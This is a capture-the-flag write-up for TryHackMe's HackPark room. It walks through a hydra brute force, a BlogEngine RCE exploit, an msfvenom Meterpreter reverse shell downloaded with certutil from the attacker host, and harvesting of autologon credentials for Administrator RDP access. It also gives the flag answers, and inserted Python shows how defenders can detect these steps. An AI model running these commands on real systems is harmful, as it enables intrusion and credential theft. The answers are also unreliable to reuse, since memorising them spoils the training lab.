HackPark Writeup - TryHackMe

The Unintended Way?

This is a writeup for the HackPark room, available on TryHackMe.

If you look through the scheduled tasks on the target system, you might find a task that has either lost its binary or is using a binary that you can change. For this method to work, the scheduled job must run as a user account with a higher privilege level than the one you currently have. However, in this walkthrough I use a different approach to elevate my privileges.

Introduction

Room Description

This room will cover brute-forcing an account's credentials, handling public exploits, using the Metasploit framework and privilege escalation on Windows.

Notes & Observations

  • The Unintended Way: I discovered autologin credentials and used them to connect to the machine through RDP as Administrator.
  • RCE is possible due to a known vulnerability in the blog engine.
  • A misconfiguration of Windows Scheduler results in privilege escalation (not presented in this writeup).
  • On Windows machines, I frequently utilise the C:\Windows\Tasks folder for fishy deals and file uploads.

Walkthrough

This chapter contains all the steps necessary to answer the questions in this room.

What's the name of the clown displayed on the homepage?

Answer: pennywise

  1. Google "clown in the IT film", or something similar. [screenshot]

What request type is the Windows website login form using?

Answer: POST

  1. Open a browser and go to the machine's IP address.
  2. Find the login page at /Account/login.aspx?ReturnURL=/admin/. [screenshot]
  3. Open the browser's developer tools and try out some random credentials. [screenshot]
  4. Check the outgoing request and its method in the developer tools. [screenshot]

Guess a username, choose a password wordlist and gain credentials to a user account!

Answer: 1qaz2wsx

  1. Prepare a hydra command with the http-form-post module based on the content of the POST request from the previous task. Specify the username as admin and use the Login Failed response string to recognise failed attempts. Add the -f parameter to stop as soon as a password is found:
    hydra -l admin -P `locate rockyou.txt` <IP> -V http-form-post '/Account/login.aspx?ReturnURL=%2fadmin%2f:__VIEWSTATE=8why9BeDxGeewwI4imjmlt7Bnb3TLyQRvMiqPw%2BgnaXJoWLcFRljfjmYmgpJmGwxDftSU9e6X5HKgJroFIk5M6o%2FWb%2BxsgSbqEaaSNVN7Moj7xvJxsEPUJSvUlGW%2FxfsrK6K%2BAb6zQRFQaVHrDqlRwTrz%2Fq8BDccONoFC7ycDfnrP9eCTBoWUpAiRwv2QPxXoB2EHQkVuTYjR8AVWzVN6vvsAG8x73OMWTOrr7TR%2FRBFPFI9nU%2Bdfii6gQ5roFvVmewsrWn1jko016tLzQGAfcnh07ufyV715%2F4Fp8t6hS3DNc0O5GdbA0VyvFZrXM7V0JZzCgxlKBafgQG%2BFb0HarIMOvHzBKW3TZ5H7CiejLaeIU97&__EVENTVALIDATION=C7Z%2BBjTp4uvotdQOHfr1Zt0newDoDu8u%2FhkojS9anlkwyxNxxpYljBFnPBMuEu0m%2FZ3wnLbtleHks9mi1ijuaaEzA%2B2VaaeSMgobCtwN5j8MMgn%2FGOb6JNxMMTCmaQ63bKuHqMIEobJ1kcqwe%2FaIwLaji1VITIBkG94kKn1pjpIiuRqb&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed' -f
    
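As an added example (not part of the original writeup), here is detection logic a defender could run over IIS request logs to spot the brute force above: it counts POSTs to /Account/login.aspx per client IP inside a sliding window and records whether a 302 redirect followed, on the assumption that BlogEngine answers a failed form login with 200 and a successful one with a redirect to ReturnURL. The log lines, the attacker address 10.10.16.1, the second client and the threshold are all constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

LOGIN_PATH = "/Account/login.aspx"   # BlogEngine login form targeted by hydra above


def parse_line(line):
    """Parse one IIS W3C line (fields as in build_sample_log); None for comments/blanks."""
    if not line.strip() or line.startswith("#"):
        return None
    date, time, method, path, query, client_ip, status = line.split()
    return {"ts": datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S"),
            "method": method, "path": path, "ip": client_ip, "status": int(status)}


def detect_login_bursts(log_text, threshold=20, window=timedelta(seconds=60)):
    """Flag each client IP whose POSTs to LOGIN_PATH reach `threshold` inside any
    `window`-long sliding span. A 302 among them is assumed to be the ReturnURL
    redirect BlogEngine issues on a successful login (i.e. the spray worked)."""
    posts = defaultdict(list)
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec and rec["method"] == "POST" and rec["path"] == LOGIN_PATH:
            posts[rec["ip"]].append(rec)
    findings = {}
    for ip, recs in posts.items():
        recs.sort(key=lambda r: r["ts"])
        start, peak = 0, 0
        for end, rec in enumerate(recs):
            while rec["ts"] - recs[start]["ts"] > window:   # slide the window start forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            findings[ip] = {"peak_attempts": peak,
                            "redirect_seen": any(r["status"] == 302 for r in recs)}
    return findings


def build_sample_log():
    """Constructed sample: 10.10.16.1 (hypothetical attacker) tries 25 passwords in
    25 seconds and the 26th attempt redirects; 10.10.16.2 logs in on its 2nd try."""
    base, fmt = datetime(2022, 4, 14, 21, 0, 0), "%Y-%m-%d %H:%M:%S"
    lines = ["#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status"]
    for i in range(26):
        ts = (base + timedelta(seconds=i)).strftime(fmt)
        lines.append(f"{ts} POST {LOGIN_PATH} ReturnURL=%2fadmin%2f 10.10.16.1 {302 if i == 25 else 200}")
    for secs, status in ((0, 200), (40, 302)):
        ts = (base + timedelta(minutes=5, seconds=secs)).strftime(fmt)
        lines.append(f"{ts} POST {LOGIN_PATH} ReturnURL=%2fadmin%2f 10.10.16.2 {status}")
    return "\n".join(lines)
```

Real IIS logs carry more fields than this sample, so adjust parse_line to the #Fields header of your own logs before use.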

Now you have logged into the website, are you able to identify the version of the BlogEngine?

Answer: 3.3.6.0

  1. Log into the blog engine with the admin:1qaz2wsx credentials.
  2. Find the About section and check the version. [screenshot]

What is the CVE?

Answer: CVE-2019-6714

  1. Search for blogengine.net 3.3.6 on exploit-db.com. [screenshot]

Who is the webserver running as?

Answer: iis apppool\blog

  1. Use this exploit to gain RCE on the machine; the steps are described in the exploit's description. Also, prepare a netcat listener to catch the reverse shell.
  2. After gaining access to the machine, run whoami:

[screenshot: whoami output]

What is the OS version of this Windows machine?

Answer: Windows 2012 R2 (6.3 Build 9600)

  1. Create a reverse shell with msfvenom:
    msfvenom -p windows/x64/meterpreter/reverse_tcp  LHOST=<IP> LPORT=<PORT> -f exe -o shell.exe
    
  2. Host the reverse shell on the attacker machine (e.g. with python3 -m http.server). On the target machine, go to the c:\Windows\Tasks folder and download the file:
    certutil.exe -urlcache -f http://<IP:PORT>/shell.exe shell.exe
    
  3. Start a listener in Metasploit (exploit/multi/handler module) on the attacker machine, using the same windows/x64/meterpreter/reverse_tcp payload as the reverse shell.
  4. Execute shell.exe on the target machine.
  5. Catch the Meterpreter session and run the sysinfo command:

[screenshot: sysinfo output]
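As an added example (not the writeup's own code), the following Python flags the noisy points of the RCE step and of this download-and-execute procedure in process-creation telemetry: the IIS worker process w3wp.exe spawning a shell, certutil being used as a downloader, and a binary run out of C:\Windows\Tasks. The events, the user names and the attacker host 10.10.16.1 are constructed; the pipe-separated field layout is an assumption for the example, not a real Sysmon or Security 4688 export.

```python
import ntpath

# Constructed process-creation events: timestamp|user|parent image|image|command line.
# Mirrors the writeup's steps (w3wp -> cmd, certutil download, shell.exe from Tasks)
# plus two benign events; 10.10.16.1 is a hypothetical attacker host.
CONSTRUCTED_EVENTS = r"""
2022-04-14 21:10:02|IIS APPPOOL\Blog|C:\Windows\System32\inetsrv\w3wp.exe|C:\Windows\System32\cmd.exe|cmd.exe /c whoami
2022-04-14 21:12:40|IIS APPPOOL\Blog|C:\Windows\System32\cmd.exe|C:\Windows\System32\certutil.exe|certutil.exe -urlcache -f http://10.10.16.1:8000/shell.exe shell.exe
2022-04-14 21:13:05|IIS APPPOOL\Blog|C:\Windows\System32\cmd.exe|C:\Windows\Tasks\shell.exe|shell.exe
2022-04-14 21:15:00|HACKPARK\jeff|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe notes.txt
2022-04-14 21:16:00|NT AUTHORITY\SYSTEM|C:\Windows\System32\services.exe|C:\Windows\System32\certutil.exe|certutil.exe -verify C:\cert.cer
"""

WEB_SERVER_IMAGES = {"w3wp.exe"}                              # IIS worker process
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "certutil.exe"}  # children a web worker should not spawn
TASKS_DIR = "c:\\windows\\tasks\\"                            # commonly writable by low-privileged users


def parse_event(line):
    """Split one event line into a dict; returns None for blank lines."""
    if not line.strip():
        return None
    ts, user, parent, image, cmdline = line.split("|", 4)
    return {"ts": ts, "user": user, "parent": parent, "image": image, "cmdline": cmdline}


def classify(event):
    """Return the detection rules an event matches (empty list = nothing to flag)."""
    hits = []
    parent = ntpath.basename(event["parent"]).lower()
    image = ntpath.basename(event["image"]).lower()
    cmd = event["cmdline"].lower()
    # 1. web worker process launching a shell: what the BlogEngine RCE looks like on the host
    if parent in WEB_SERVER_IMAGES and image in SHELL_IMAGES:
        hits.append("webserver-spawned-shell")
    # 2. certutil used as a downloader (-urlcache with a URL); a plain -verify is not flagged
    if image == "certutil.exe" and "-urlcache" in cmd and "http" in cmd:
        hits.append("certutil-remote-download")
    # 3. anything executed out of C:\Windows\Tasks (ntpath handles the Windows paths on any OS)
    if ntpath.normpath(event["image"]).lower().startswith(TASKS_DIR):
        hits.append("exec-from-windows-tasks")
    return hits


def scan(events_text):
    """Return (timestamp, user, matched rules) for every event that matched something."""
    results = []
    for line in events_text.splitlines():
        ev = parse_event(line)
        if ev and (hits := classify(ev)):
            results.append((ev["ts"], ev["user"], hits))
    return results
```

Seeing the three rules fire in sequence under the same app-pool identity is the chain to alert on, rather than any single hit.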

What is the name of the abnormal service running?

Answer: WindowsScheduler

  1. Open a shell session in Meterpreter on the target machine and list running services:
    wmic service list brief | findstr "Running"
    

What is the name of the binary you're supposed to exploit?

Answer: Message.exe

  1. Go to the Windows Scheduler's Events folder:
    cd "c:\Program Files (x86)\SystemScheduler\Events"
    
  2. Check the content of the 20198415519.INI_LOG.txt file:

[screenshot: content of 20198415519.INI_LOG.txt]

What is the user flag (on Jeff's Desktop)?

Answer: 759bd8af507517bcfaede78a21a73e39

  1. Download the latest winPEASx64.exe from GitHub.
  2. Host this file on your machine and upload it to the target machine by means of Meterpreter's upload command.
  3. On the target machine, run winPEASx64.exe.
  4. It reveals autologon credentials: administrator:4q6XvFES7Fdxs [screenshot]
  5. If you check the open ports, you'll see that the RDP service is running (port 3389):
    nmap 10.10.16.13 -sS -Pn -sV
    
    [screenshot: nmap output]
  6. Log in with these credentials (I use Remmina). You are Administrator now. [screenshot]
  7. Get the user.txt flag at c:\users\jeff\Desktop\user.txt

What is the root flag?

Answer: 7e13d97f05f7ceb9881a3eb3d78d3e72

  1. Get the root.txt flag at c:\users\Administrator\Desktop\root.txt

Using winPeas, what was the Original Install time? (This is date and time)

Answer: 8/3/2019, 10:43:23 AM

  1. Run the systeminfo command on the target machine. [screenshot]